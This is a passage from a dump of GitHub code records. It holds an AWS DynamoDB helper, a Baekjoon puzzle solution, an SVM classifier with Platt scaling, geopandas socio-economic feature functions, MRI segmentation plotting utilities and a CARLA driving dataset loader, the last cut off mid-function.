'KeyType': 'RANGE' #Sort key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'order_id',\n 'AttributeType': 'N'\n },\n {\n 'AttributeName': 'ts',\n 'AttributeType': 'S'\n },\n\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10\n }\n )\n\n return table\n\n\n def _delete_table(self):\n table = self._dynamodb.Table('Order')\n\n table.delete()\n","repo_name":"pkr06/AWS","sub_path":"dynamodb.py","file_name":"dynamodb.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3957916561","text":"# 일곱난쟁이 (IM 대비문제 1)\ndef dfs(y, total):\n if total == 100 and visited.count(True) == 7:\n if not ans: # 한번만 출력\n for i in range(len(heights)):\n if visited[i]:\n ans.append(heights[i])\n return\n\n if y >= 9 or total > 100:\n return\n\n visited[y] = True\n dfs(y + 1, total + heights[y])\n visited[y] = False\n dfs(y + 1, total)\n\nheights = []\nfor i in range(9):\n heights.append(int(input()))\nvisited = [False] * len(heights)\nans = []\ndfs(0, 0)\nans = sorted(ans)\nfor a in ans:\n print(a)","repo_name":"hybae430/Baekjoon","sub_path":"2309.py","file_name":"2309.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33992051878","text":"# Simple SVM\nimport numpy as np\nfrom scipy.optimize import minimize\nfrom scipy.special import expit\n\nfrom tqdm import tqdm\n\nfrom itertools import combinations\n\n\nclass SVC:\n\n def __init__(self, C=1, kernel=None, tol=1e-5):\n self.kernel = kernel\n self.C = C\n\n self.X = None\n self.y = None\n\n self.alpha = None\n self.b = None\n\n self.scale = None\n\n self.tol = tol\n\n self.X_multi = None\n\n self.alpha_multi = None\n self.b_multi = None\n\n self.scale_multi = None\n\n self.nb_class = None\n\n def fit(self, X, y):\n self.b = 0\n\n N = len(y)\n hXX = self.kernel(X, X)\n G = 
np.einsum('ij,i,j->ij', hXX, y, y)\n A = np.vstack((-np.eye(N), np.eye(N)))\n b = np.hstack((np.zeros(N), self.C * np.ones(N)))\n\n def loss(alpha):\n return -alpha.sum() + 0.5 * alpha.dot(alpha.dot(G))\n\n def grad_loss(alpha):\n return -np.ones_like(alpha) + alpha.dot(G)\n\n fun_eq = lambda alpha: np.dot(alpha, y)\n jac_eq = lambda alpha: y\n fun_ineq = lambda alpha: b - np.dot(A, alpha)\n jac_ineq = lambda alpha: -A\n\n constraints = ({'type': 'eq', 'fun': fun_eq, 'jac': jac_eq},\n {'type': 'ineq',\n 'fun': fun_ineq,\n 'jac': jac_ineq})\n\n optRes = minimize(fun=lambda alpha: loss(alpha),\n x0=np.random.normal(size=N),\n method='SLSQP',\n jac=lambda alpha: grad_loss(alpha),\n constraints=constraints)\n self.alpha = optRes.x\n\n margin_pointsIndices = self.alpha > self.tol\n boundaryIndices = (self.alpha > self.tol) * (self.C - self.alpha > self.tol)\n self.X = X[margin_pointsIndices]\n self.y = y[margin_pointsIndices]\n self.alpha = y[margin_pointsIndices] * self.alpha[margin_pointsIndices]\n self.b = y[boundaryIndices][0] - \\\n self.separating_function(np.expand_dims(X[boundaryIndices][0], axis=0))\n\n self._platt_fit()\n\n def separating_function(self, x):\n x1 = self.kernel(self.X, x)\n return np.einsum('ij,i->j', x1, self.alpha) + self.b\n\n def predict(self, X):\n d = self.separating_function(X)\n # separating_function already includes the bias self.b, so threshold d directly\n return 2 * (d > 0) - 1\n\n def _platt_fit(self):\n mylog = lambda x: 0 if x == 0 else np.log(x)\n sigmoid = lambda x, param1, param2: expit(-(x * param1 + param2))\n\n out = self.separating_function(self.X)\n L = self.y\n target = L == 1\n prior1 = np.float64(np.sum(target))\n prior0 = len(target) - prior1\n\n A = 0\n B = np.log((prior0 + 1) / (prior1 + 1))\n hiTarget = (prior1 + 1) / (prior1 + 2)\n loTarget = 1 / (prior0 + 2)\n labda = 1e-3\n olderr = 1e300\n\n pp = np.ones(out.shape) * (prior1 + 1) / (prior0 + prior1 + 2)\n\n T = np.zeros(target.shape)\n for _ in range(1, 200):\n a, b, c, d, e = 0, 0, 0, 0, 0\n for i in range(len(out)):\n if target[i]:\n t = hiTarget\n T[i] = t\n else:\n t = loTarget\n T[i] = t\n d1, d2 = pp[i] - t, pp[i] * (1 - pp[i])\n\n a += out[i] * out[i] * d2\n b += d2\n c += out[i] * d2\n d += out[i] * d1\n e += d1\n if abs(d) < 1e-9 and abs(e) < 1e-9:\n break\n oldA, oldB = A, B\n err, count = 0, 0\n while True:\n det = (a + labda) * (b + labda) - c * c\n if det == 0:\n labda *= 10\n A = oldA + ((b + labda) * d - c * e) / det\n B = oldB + ((a + labda) * e - c * d) / det\n err = 0\n for i in range(len(out)):\n p = sigmoid(out[i], A, B)\n pp[i] = p\n t = T[i]\n err -= t * mylog(p) + (1 - t) * mylog(1 - p)\n if err < olderr * (1 + 1e-7):\n labda *= 0.1\n break\n labda *= 10\n if labda > 1e6:\n break\n diff = err - olderr\n scale = 0.5 * (err + olderr + 1)\n if -1e-3 * scale < diff < 1e-7 * scale:\n count += 1\n else:\n count = 0\n olderr = err\n if count == 3:\n break\n self.scale = lambda x: sigmoid(x, A, B)\n\n def fit_multiclass(self, X, y):\n nb_class = np.max(y) + 1\n self.nb_class = nb_class\n alpha_multi, X_multi, b_multi = {}, {}, {}\n scale_multi = {}\n\n for i, j in tqdm(combinations(range(nb_class), 2)):\n ind_i, ind_j = y == i, y == j\n y_ij = y[ind_i + ind_j]\n y_ij[y_ij == i], y_ij[y_ij == j] = -1, 1\n X_ij = X[ind_i + ind_j]\n self.fit(X_ij, y_ij)\n alpha_multi[(i, j)] = self.alpha\n b_multi[(i, j)] = self.b\n X_multi[(i, j)] = self.X\n scale_multi[(i, j)] = self.scale\n\n self.X_multi = X_multi\n self.scale_multi = scale_multi\n self.alpha_multi = alpha_multi\n self.b_multi = b_multi\n\n def predict_multiclass(self, X):\n n = len(X)\n 
prediction = np.array([[[0., 0.] for _ in range(self.nb_class)] for _ in range(n)])\n\n for i, j in combinations(range(self.nb_class), 2):\n X_ij, alpha_ij, b_ij = self.X_multi[(i, j)], self.alpha_multi[(i, j)], self.b_multi[(i, j)]\n scale_ij = self.scale_multi[(i, j)]\n\n predict_labels_ij = np.einsum('ij,i->j', self.kernel(X_ij, X), alpha_ij) + b_ij\n predict_labels_ij = scale_ij(predict_labels_ij)\n for k in range(n):\n prediction[k][j] += np.array([predict_labels_ij[k], 1])\n prediction[k][i] += np.array([1 - predict_labels_ij[k], 1])\n\n final_prediction = np.zeros(n)\n for k, probs in enumerate(prediction):\n proba = probs[:, 0] / probs[:, 1]\n final_prediction[k] = np.argmax(proba)\n\n return final_prediction\n","repo_name":"geoffroyO/scikit_eco_plus","sub_path":"models/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"14139623139","text":"\"\"\"\nSocio-econ related features.\n\"\"\"\n\n# Imports\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\n\n\ndef pop_dens(gdf, gdf_dens,column_name,buffer_size):\n \"\"\"\n Returns a population density value taken from gdf_dens for each point in gdf.\n The value is calculated by taking the weighted average of all density values intersecting \n a buffer around the point.\n\n Args: \n - gdf: geodataframe with points in 'geometry' column or in hex format\n - gdf_dens: geodataframe with polygon or hex raster containing population density values\n - column_name: name of column with data of interest\n - buffer_size: buffer_size (radius in m) for buffer around point; if buffer is None \n data must be given in hex\n - APERTURE_SIZE: raster of hex\n\n Returns:\n - gdf_out which is gdf + a column with population density values\n\n Last update: 21/04/21. 
By Felix.\n\n \"\"\"\n if buffer_size is not None:\n # create gdf_out\n gdf_out = gdf\n \n # create buffer around points in gdf\n gdf.geometry = gdf.geometry.centroid.buffer(buffer_size)\n\n # calculate buffer area\n buffer_area = 3.1416*(buffer_size**2)\n\n # get density polygons intersecting the buffer\n gdf_joined = gpd.sjoin(gdf,gdf_dens[[column_name,'geometry']],how =\"left\", op=\"intersects\")\n\n # define function that calculates intersecting area of buffer and dens polygons\n def get_inter_area(row):\n try:\n # calc intersection area\n out = (row.geometry.intersection(gdf_dens.geometry[row.index_right])).area\n except:\n # in rows which don't intersect with a raster of the density data (NaN)\n out = 0 \n return out # intersecting area\n\n # calculate shared area of polygons\n gdf_joined['dens_part']=gdf_joined.apply(get_inter_area,axis=1)\n \n # calculate their share in the buffer\n gdf_joined['dens_part']=gdf_joined['dens_part']/buffer_area \n\n # initialise new column in gdf\n gdf_out['feature_pop_density'] = 0\n \n # assign weighted average population dens value to each point in gdf \n for index in gdf_out.index:\n try:\n # multiply pop dens value with dens_part and sum up the parts to get weighted average\n gdf_out.feature_pop_density.loc[index] = sum(gdf_joined[column_name].loc[index]*gdf_joined.dens_part.loc[index])\n except:\n # assign 0 for points that don't intersect the population density raster\n gdf_out.feature_pop_density.loc[index] = 0\n continue\n else:\n # define hex_col name\n #hex_col = 'hex'+str(APERTURE_SIZE)\n hex_col = 'hex_id'\n # merge trips hex with pop dens hex\n gdf2 = gdf_dens.drop(columns={'geometry'})\n gdf_out = gdf.merge(gdf2,left_on = hex_col, right_on = hex_col)\n \n # find trips that don't have hex data and add 0s\n gdf_diff = gdf.merge(gdf2, how = 'outer' ,indicator=True).loc[lambda x : x['_merge']=='left_only']\n gdf_diff[column_name] = 0\n gdf_diff = gdf_diff.drop(columns=\"_merge\")\n \n # add both together and drop unwanted columns\n gdf_out = pd.concat([gdf_out,gdf_diff], ignore_index=True)\n gdf_out = gdf_out.drop(columns={'OBJECTID','GRD_ID','CNTR_ID','Country','Date','Method','Shape_Leng','Shape_Area'})\n gdf_out = gdf_out.rename(columns={column_name:'feature_pop_density'})\n \n print('Calculated population density')\n return gdf_out\n\n\ndef reorganize_social_status(gdf, column_names):\n \"\"\"\n changing the order of the social status numbering\n so that 1 is low and 4 is high (which then aligns with\n other features, such as income)\n \n Args:\n - gdf: geopandas dataframe containing social status data in h3\n - column_names = names of the columns in gdf_si of interest\n Returns: \n - gdf_out which is equal to gdf, but with reordered column column_names[0] \n \n \"\"\"\n gdf.loc[gdf.status_index==1.0,column_names[0]] = 5.0\n gdf.loc[gdf.status_index==2.0,column_names[0]] = 6.0\n gdf.loc[gdf.status_index==3.0,column_names[0]] = 2.0\n gdf.loc[gdf.status_index==4.0,column_names[0]] = 1.0\n gdf.loc[gdf.status_index==5.0,column_names[0]] = 4.0\n gdf.loc[gdf.status_index==6.0,column_names[0]] = 3.0\n gdf_out = gdf.copy()\n return gdf_out\n\n\ndef social_index(gdf,gdf_si,column_names):\n \"\"\"\n Returns the social status as well as the derivative of the social status within a hex of size APERTURE_SIZE.\n\n Args: \n - gdf: geopandas dataframe containing trip data in h3\n - gdf_si: geopandas dataframe containing social status data in h3\n - column_names = names of the columns in gdf_si of interest\n - APERTURE_SIZE: h3 size\n\n Returns:\n - gdf_out 
def social_index(gdf,gdf_si,column_names):\n    \"\"\"\n    Returns the social status as well as the derivative of the social status within a hex of size APERTURE_SIZE.\n\n    Args:\n    - gdf: geopandas dataframe containing trip data in h3\n    - gdf_si: geopandas dataframe containing social status data in h3\n    - column_names = names of the columns in gdf_si of interest\n    - APERTURE_SIZE: h3 size\n\n    Returns:\n    - gdf_out which is gdf + 2 columns: 'feature_social_status_index', 'feature_social_dynamic_index'\n\n    Last update: 21/04/21. By Felix.\n\n    \"\"\"\n    # define hex_col name\n    hex_col = 'hex_id'\n    # switch the social status data ordering so that it aligns with other features\n    gdf_si = reorganize_social_status(gdf_si,column_names)\n\n    # merge trips hex with social status hex\n    gdf2 = gdf_si.drop(columns={'geometry'})\n    gdf_out = gdf.merge(gdf2,left_on = hex_col, right_on = hex_col)\n\n    # find trips that don't have hex data and add NaNs\n    gdf_diff = gdf.merge(gdf2, how = 'outer' ,indicator=True).loc[lambda x : x['_merge']=='left_only']\n    gdf_diff[column_names] = np.NaN\n    gdf_diff = gdf_diff.drop(columns=\"_merge\")\n\n    # add both together and drop unwanted columns\n    gdf_out = pd.concat([gdf_out,gdf_diff], ignore_index=True)\n    gdf_out = gdf_out.drop(columns={'Unnamed: 0','district','section','area','population','class','class.1','status_dynamic_index'})\n    gdf_out = gdf_out.rename(columns={'status_index':'feature_social_status_index','dynamic_index':'feature_social_dynamic_index'})\n\n    # turn the categorical +, +/- and - into 1.0, 0.0 and -1.0\n    gdf_out.loc[gdf_out.feature_social_dynamic_index == '+', 'feature_social_dynamic_index'] = 1.0\n    gdf_out.loc[gdf_out.feature_social_dynamic_index == '+/-', 'feature_social_dynamic_index'] = 0.0\n    gdf_out.loc[gdf_out.feature_social_dynamic_index == '-', 'feature_social_dynamic_index'] = -1.0\n    # convert to numeric\n    gdf_out.feature_social_dynamic_index = pd.to_numeric(gdf_out.feature_social_dynamic_index)\n\n    print('Calculated social status')\n    return gdf_out\n\ndef transit_dens(gdf,gdf_transit,column_name):\n    \"\"\"\n    Returns the number of transit stations inside of hexagons.\n\n    Args:\n    - gdf: geopandas dataframe containing trip data in h3\n    - gdf_transit: geopandas dataframe containing the number of transit stops in h3\n    - column_name = name of the column in gdf_transit of interest\n    - APERTURE_SIZE: h3 size\n\n    Returns:\n    - gdf_out which is gdf + 1 column: 'feature_transit_density'\n\n    Last update: 11/05/21. By Felix.\n\n    \"\"\"\n    hex_col = 'hex_id'\n    # merge trips hex with transit hex\n    gdf2 = gdf_transit.drop(columns={'geometry'})\n    gdf_out = gdf.merge(gdf2,left_on = hex_col, right_on = hex_col)\n\n    # find trips that don't have hex data and add 0s\n    gdf_diff = gdf.merge(gdf2, how = 'outer' ,indicator=True).loc[lambda x : x['_merge']=='left_only']\n    gdf_diff[column_name] = 0\n    gdf_diff = gdf_diff.drop(columns=\"_merge\")\n\n    # add both together and drop unwanted columns\n    gdf_out = pd.concat([gdf_out,gdf_diff], ignore_index=True)\n    gdf_out = gdf_out.drop(columns={'lat','lng'})\n    gdf_out = gdf_out.rename(columns={column_name:'feature_transit_density'})\n    print('Calculated transit density')\n    return gdf_out\n\n
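# The hex-level joins in this module (social_index and transit_dens above,\n# income below) share one merge-and-fill pattern; a self-contained toy sketch\n# (hypothetical data, not project files):\n#\n#   import pandas as pd\n#   trips = pd.DataFrame({'hex_id': ['a', 'b', 'c']})\n#   stops = pd.DataFrame({'hex_id': ['a', 'c'], 'n_stops': [3, 1]})\n#   matched = trips.merge(stops, on='hex_id')\n#   missing = (trips.merge(stops, how='outer', indicator=True)\n#              .loc[lambda x: x['_merge'] == 'left_only'])\n#   missing['n_stops'] = 0\n#   out = pd.concat([matched, missing.drop(columns='_merge')], ignore_index=True)\n#   # every hex_id now carries n_stops, with 0 where no match existed\n\n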
def income(gdf,gdf_si,column_names):\n    \"\"\"\n    Returns the income within a hex of size APERTURE_SIZE. The income is the weighted average income per plz.\n    The weighted average income is calculated based on categories 1-7, derived from Axciom data.\n\n    Args:\n    - gdf: geopandas dataframe containing trip data in h3\n    - gdf_si: geopandas dataframe containing income data in h3\n    - column_names = names of the columns in gdf_si of interest\n    - APERTURE_SIZE: h3 size\n\n    Returns:\n    - gdf_out which is gdf + 1 column: 'feature_income'\n\n    Last update: 21/04/21. By Felix.\n\n    \"\"\"\n    # define hex_col name\n    #hex_col = 'hex'+str(APERTURE_SIZE)\n    hex_col = 'hex_id'\n    # merge trips hex with income hex\n    gdf2 = gdf_si.drop(columns={'geometry'})\n    gdf_out = gdf.merge(gdf2,left_on = hex_col, right_on = hex_col)\n\n    # find trips that don't have hex data and add NaNs\n    gdf_diff = gdf.merge(gdf2, how = 'outer' ,indicator=True).loc[lambda x : x['_merge']=='left_only']\n    gdf_diff[column_names] = np.NaN\n    gdf_diff = gdf_diff.drop(columns=\"_merge\")\n\n    # add both together and drop unwanted columns\n    gdf_out = pd.concat([gdf_out,gdf_diff], ignore_index=True)\n    gdf_out = gdf_out.drop(columns={'plz','ph_to','stat_1u2', 'stat_3','stat_4','stat_5','stat_6','stat_7','stat_8u9','mean'})\n    gdf_out = gdf_out.rename(columns={'weigthed_mean':'feature_income'})\n\n    print('Calculated income status')\n    return gdf_out\n","repo_name":"wagnerfe/xml4urbanformanalysis","sub_path":"ufo-map/ufo_map/Feature_engineering/socio_econ.py","file_name":"socio_econ.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1681114010","text":"'''\nCreated on 21. apr. 2021\n\n@author: Bruger\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.preprocessing.image import img_to_array, load_img\nimport skimage.feature\n\n#Helper to plot image and mask pair\ndef plot_img_mask(img_path,mask_path):\n\n    img = load_img(img_path)\n    img_arr = img_to_array(img)\n    img_arr /= 255.\n\n    plt.figure()\n    plt.imshow(img_arr,cmap='gray')\n\n\n    #maskImg=load_img(mask_path, color_mode=\"grayscale\")\n    #maskImg=np.expand_dims(maskImg, 2)\n\n    maskImg=plt.imread(mask_path)\n    plt.figure()\n    plt.imshow(maskImg,cmap='gray')\n\n    plt.show()\n\ndef plot_training_history(history):\n\n    #Plot performance from training\n    #TODO: Consider plotting dice measure\n    #acc = history.history['acc']\n    #val_acc = history.history['val_acc']\n    #plt.plot(epochs, acc, 'bo', label='Training acc')\n    #plt.plot(epochs, val_acc, 'b', label='Validation acc')\n    #plt.title('Training and validation accuracy')\n    #plt.legend()\n\n\n    loss = history.history['loss']\n    val_loss = history.history['val_loss']\n    epochs = range(1, len(loss) + 1)\n\n    plt.figure()\n    plt.plot(epochs, loss, 'bo', label='Training loss')\n    plt.plot(epochs, val_loss, 'b', label='Validation loss')\n    plt.title('Training and validation loss')\n    plt.legend()\n    plt.show(block=False)\n\n#Method to plot mask on top of MR image\ndef plot_predictionsv2(predictions, generator,batch_to_show):\n\n    mri_img, mask = generator.__getitem__(batch_to_show) #getitem input is batch index.\n    batch_size = generator.batch_size\n    for i in range(batch_size):\n        # load predicted mask\n        predicted_mask = predictions[i+batch_size*batch_to_show]\n        rounded = np.round(predicted_mask,0) #rounds the array to integers.\n\n        # load MRI\n        mr_img_arr = mri_img[i] #Added to plot preprocessed MRI\n\n        # load ground truth mask\n        mask_arr = mask[i] #Added to plot preprocessed MRI\n\n        # compute edges for the ground truth mask\n        edges_gt = skimage.feature.canny(\n            image=np.squeeze(mask_arr),\n            sigma=1,\n            low_threshold=0.1,\n            high_threshold=0.9,\n        ) #shape = 512,512\n        # compute edges for the predicted mask\n        edges_pred = skimage.feature.canny(\n            image=np.squeeze(rounded),\n            sigma=1,\n            low_threshold=0.1,\n            high_threshold=0.9,\n        ) #shape = 512,512\n        # rgb for red is (255,0,0)\n        # draw the ground truth mask edges in red
\n        Mask_gt_pred = np.zeros((512,512,3))\n        for l in range(0,512):\n            for w in range(0,512):\n                if edges_gt[l,w]==True:\n                    Mask_gt_pred[l,w,:] = [255,0,0] #red\n\n        # draw the predicted mask edges in green\n        for l in range(0,512):\n            for w in range(0,512):\n                if edges_pred[l,w]==True:\n                    Mask_gt_pred[l,w,:] = [0,255,0] #green\n        # plot the MR image with both outlines\n        plt.figure()\n        pic = mr_img_arr+Mask_gt_pred\n        plt.imshow(pic)\n        plt.title('MRI, ground truth is red and prediction is green')\n\n        plt.show()\n\ndef plot_predictions(predictions, input_img_paths, mask_paths):\n    #Selected slice to compare\n    i = 5\n    #Plots\n    #plt.subplot(1,2,1)\n    predicted_mask = predictions[i]\n    rounded = np.round(predicted_mask,0)\n    plt.figure()\n    plt.imshow(rounded,cmap='gray')\n\n    #plt.subplot(1,2,2)\n    #Print paths to ensure that they match\n    print(\"input path: \" + input_img_paths[i])\n    print(\"mask path: \" + mask_paths[i])\n\n    #Plot MRI and mask via utility module\n    plot_img_mask(input_img_paths[i], mask_paths[i])\n\n    #Plot mask alone\n    #maskImg=plt.imread(mask_paths[i])\n    #plt.imshow(maskImg,cmap='gray')\n    #plt.show()\n\ndef make_boxplot_plot(dice):\n    plt.figure()\n    plt.boxplot(np.asarray(dice))\n    plt.title('Boxplot of DICE pr. image. Total images: %d'%(len(dice)))\n    plt.xlabel(\"Batch nr.\")\n    plt.ylabel(\"Dice score\")\n    plt.ylim(0,1)\n    #plt.show()\n\ndef make_maskSize_vs_DICE_plot(dice,maskSize):\n    flattenDice = [item for sublist in dice for item in sublist]\n\n    plt.figure()\n    plt.scatter(maskSize,flattenDice)\n    plt.title('Plot GT mask size vs DICE pr. image. Total batches: %d . Total images: %d'%(len(dice),len(flattenDice)))\n    plt.xlabel(\"Mask size, in proportion of total img\")\n    plt.ylabel(\"Dice score\")\n\n    #obtain m (slope) and b (intercept) of the linear regression line\n    m, b = np.polyfit(maskSize,flattenDice, 1)\n\n    #add the linear regression line to the scatterplot\n    plt.plot(maskSize, m*np.array(maskSize)+b, color=\"red\")\n    textStr = \"Regression: y=%2.3f x + %1.3f\"%(m,b)\n    plt.text(0.03, 0, textStr)\n","repo_name":"nthostrup/ST8","sub_path":"Project_modules/plotting_module.py","file_name":"plotting_module.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9988049296","text":"import os\nimport json\nimport argparse\nimport cv2\nimport numpy as np\nfrom pathlib import Path\nfrom PIL import Image\n\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom driving_agents.king.aim_bev.training_utils import augment_all, get_crop_offsets, transform_2d_points\n\n# Global Flags\nPIXEL_SHIFT = 14\nPIXELS_AHEAD_VEHICLE = 96 + PIXEL_SHIFT\n\n\ndef build_parser():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--dataset_name', type=str)\n    parser.add_argument('--dataset_load_path', type=str)\n    parser.add_argument('--dataset_save_path', type=str)\n    parser.add_argument('--do_augmentation', type=int, default=1)\n    parser.add_argument('--aug_max_rotation', type=float, default=20, help='Max rotation angle [degree] for augmentation. 0.0 equals no augmentation.')\n    parser.add_argument('--seq_len', type=int, default=1, help='Input sequence length (factor of 10).')\n    parser.add_argument('--pred_len', type=int, default=4, help='Number of timesteps to predict.')\n\n    return parser\n\n
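# Usage sketch for the parser above (hypothetical flag values):\n#\n#   args = build_parser().parse_args(\n#       ['--dataset_name', 'demo', '--seq_len', '1', '--pred_len', '4']\n#   )\n#   assert args.do_augmentation == 1  # default\n\n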
class CARLA_Data(Dataset):\n    \"\"\"\n    Dataset class for topdown maps and vehicle control in CARLA.\n    \"\"\"\n    def __init__(self, args, root, aug_max_rotation=0.0, create_webdataset=False):\n\n        self.args = args\n\n        self.seq_len = args.seq_len\n        self.pred_len = args.pred_len\n\n        self.create_webdataset = create_webdataset\n\n        self.target_im_size = args.target_im_size  # (192, 192)\n\n        self.aug_max_rotation = aug_max_rotation\n\n        self.bev = []\n        self.x = []\n        self.y = []\n        self.brake_seq = []\n        self.x_old = []\n        self.y_old = []\n        self.x_command = []\n        self.y_command = []\n        self.command = []\n        self.theta = []\n        self.theta_old = []\n        self.speed = []\n        self.steer = []\n        self.throttle = []\n        self.brake = []\n        self.light = []\n\n        # get offsets for a bigger crop in case we augment the BEVs\n        self.offsets = get_crop_offsets(self.aug_max_rotation, self.target_im_size)\n        for root_ix, sub_root in enumerate(root):\n            sub_root_k = sub_root.replace('kchitta31', 'krenz73')\n            Path(sub_root_k).mkdir(parents=True, exist_ok=True)\n            preload_file = os.path.join(sub_root_k, 'pl_'+str(self.seq_len)+'_'+str(self.pred_len)+'bev_planner.npy')\n\n            # dump to npy if no preload\n            if not os.path.exists(preload_file):\n                preload_bev = []\n                preload_x = []\n                preload_y = []\n                preload_x_old = []\n                preload_y_old = []\n                preload_brake_seq = []\n                preload_x_command = []\n                preload_y_command = []\n                preload_command = []\n                preload_theta = []\n                preload_theta_old = []\n                preload_speed = []\n                preload_steer = []\n                preload_throttle = []\n                preload_brake = []\n                preload_light = []\n\n                # list sub-directories in root\n                root_files = os.listdir(sub_root)\n\n                routes = [folder for folder in root_files if not os.path.isfile(os.path.join(sub_root,folder))]\n\n                for route in routes:\n                    route_dir = os.path.join(sub_root, route)\n                    file_list = os.listdir(route_dir+\"/topdown/\")\n                    file_list.sort()\n                    measurement_file_list = os.listdir(route_dir+\"/measurements/\")\n                    measurement_file_list.sort()\n\n                    if len(file_list) == 0 or len(measurement_file_list) == 0:\n                        print(f'Skip: {route_dir}')\n                        continue\n\n                    _factor = -(-len(measurement_file_list) // len(file_list))  # ceiling division\n\n                    _recording_freq_mult = self.args.king_data_fps // 2\n\n                    _usable_measurements = len(measurement_file_list) - int(self.pred_len * _recording_freq_mult) - 1\n\n                    _usable_images = _usable_measurements // _factor\n\n                    num_seq = _usable_images // self.seq_len\n                    for seq in range(1,num_seq-1):\n                        bev = []\n                        xs = []\n                        ys = []\n                        thetas = []\n                        speeds = []\n                        steer = []\n                        throttle = []\n                        brake = []\n                        brake_seq = []\n                        light = []\n\n                        for i in range(self.seq_len):\n                            # segmentation images\n                            filename_topdown = file_list[seq*self.seq_len+i]\n                            filename = file_list[seq*self.seq_len+i].split(\".\")[0].split(\"_\")[1]\n                            bev.append(route_dir+\"/topdown/\"+filename_topdown)\n\n                            # position\n                            with open(route_dir + f\"/measurements/{filename}.json\", \"r\") as read_file:\n                                data = json.load(read_file)\n                            xs.append(data['x'])\n                            ys.append(data['y'])\n                            brake_seq.append(data['brake'])\n                            thetas.append(data['theta'])\n                            speeds.append(data['speed'])\n                            steer.append(data['steer'])\n                            throttle.append(data['throttle'])\n                            brake.append(data['brake'])\n                            light.append(data['light_hazard'])\n\n\n                        filename_prev = 
file_list[seq*self.seq_len-_recording_freq_mult].split(\".\")[0].split(\"_\")[1]\n with open(route_dir + f\"/measurements/{filename_prev}.json\", \"r\") as read_file_prev:\n data_prev = json.load(read_file_prev)\n\n preload_command.append([data_prev['command'], data['command']])\n\n # get control value of final frame in sequence\n preload_x_command.append(data['x_command'])\n preload_y_command.append(data['y_command'])\n preload_x.append([wp[0] for wp in data['waypoints']])\n preload_y.append([wp[1] for wp in data['waypoints']])\n preload_theta.append([wp[2] for wp in data['waypoints']])\n\n # read files sequentially (future frames)\n curr_file_index = int(filename)\n for i in range(self.seq_len, self.seq_len + self.pred_len):\n\n with open(route_dir + f\"/measurements/{str(curr_file_index+i * _recording_freq_mult).zfill(4)}.json\", \"r\") as read_file:\n data = json.load(read_file)\n xs.append(data['x'])\n ys.append(data['y'])\n brake_seq.append(data['brake'])\n\n # fix for theta=nan in some measurements\n if np.isnan(data['theta']):\n thetas.append(0)\n else:\n thetas.append(data['theta'])\n\n preload_bev.append(bev)\n\n preload_x_old.append(xs)\n preload_y_old.append(ys)\n preload_brake_seq.append(brake_seq)\n preload_theta_old.append(thetas)\n preload_speed.append(speeds)\n preload_steer.append(steer)\n preload_throttle.append(throttle)\n preload_brake.append(brake)\n preload_light.append(light)\n\n # dump to npy\n preload_dict = {}\n preload_dict['bev'] = preload_bev\n preload_dict['x'] = preload_x_old\n preload_dict['y'] = preload_y_old\n preload_dict['brake_seq'] = preload_brake_seq\n preload_dict['x_old'] = preload_x_old\n preload_dict['y_old'] = preload_y_old\n preload_dict['x_command'] = preload_x_command\n preload_dict['y_command'] = preload_y_command\n preload_dict['command'] = preload_command\n preload_dict['theta'] = preload_theta_old\n preload_dict['theta_old'] = preload_theta_old\n preload_dict['speed'] = preload_speed\n preload_dict['steer'] = preload_steer\n preload_dict['throttle'] = preload_throttle\n preload_dict['brake'] = preload_brake\n preload_dict['light'] = preload_light\n np.save(preload_file, preload_dict)\n\n # load from npy if available\n preload_dict = np.load(preload_file, allow_pickle=True)\n self.bev += preload_dict.item()['bev']\n self.x += preload_dict.item()['x']\n self.y += preload_dict.item()['y']\n self.brake_seq += preload_dict.item()['brake_seq']\n self.x_old += preload_dict.item()['x_old']\n self.y_old += preload_dict.item()['y_old']\n self.x_command += preload_dict.item()['x_command']\n self.y_command += preload_dict.item()['y_command']\n self.command += preload_dict.item()['command']\n self.theta += preload_dict.item()['theta']\n self.theta_old += preload_dict.item()['theta_old']\n self.speed += preload_dict.item()['speed']\n self.steer += preload_dict.item()['steer']\n self.throttle += preload_dict.item()['throttle']\n self.brake += preload_dict.item()['brake']\n self.light += preload_dict.item()['light']\n\n def __len__(self):\n \"\"\"Returns the length of the dataset. \"\"\"\n return len(self.bev)\n\n def __getitem__(self, index):\n \"\"\"Returns the item at index idx. 
\"\"\"\n data = dict()\n data['bev'] = []\n\n seq_bev = self.bev[index]\n seq_x = self.x[index]\n seq_y = self.y[index]\n seq_x_old = self.x_old[index]\n seq_y_old = self.y_old[index]\n seq_theta = self.theta[index]\n seq_theta_old = self.theta_old[index]\n\n if self.args.do_augmentation and self.aug_max_rotation!=0:\n no_augment = np.random.randint(2) # we augment 50% of the samples\n else:\n no_augment = 1\n\n for i in range(self.seq_len):\n\n self.angle = torch.tensor([0.0]) # we don't want to augment now -> this would be static. We augment in the Webdatset dataloader dynamically.\n crop = load_crop_bev_png(seq_bev[i], self.args.do_augmentation, self.offsets, self.target_im_size, 'Encoded_cropped')\n\n #only needed for normal dataloader not for webdataset\n crop=np.moveaxis(crop,0,2)\n\n crop = cv2.cvtColor(crop, cv2.COLOR_RGB2BGR)\n crop=np.moveaxis(crop,2,0)\n\n data['bev'].append(crop)\n\n # fix for theta=nan in some measurements\n if np.isnan(seq_theta[i]):\n seq_theta[i] = 0.\n if np.isnan(seq_theta_old[i]):\n seq_theta_old[i] = 0.\n\n ego_x = seq_x[i]\n ego_y = seq_y[i]\n ego_theta = seq_theta[i]\n\n # ##### waypoint processing to local coordinates\n waypoints = []\n # 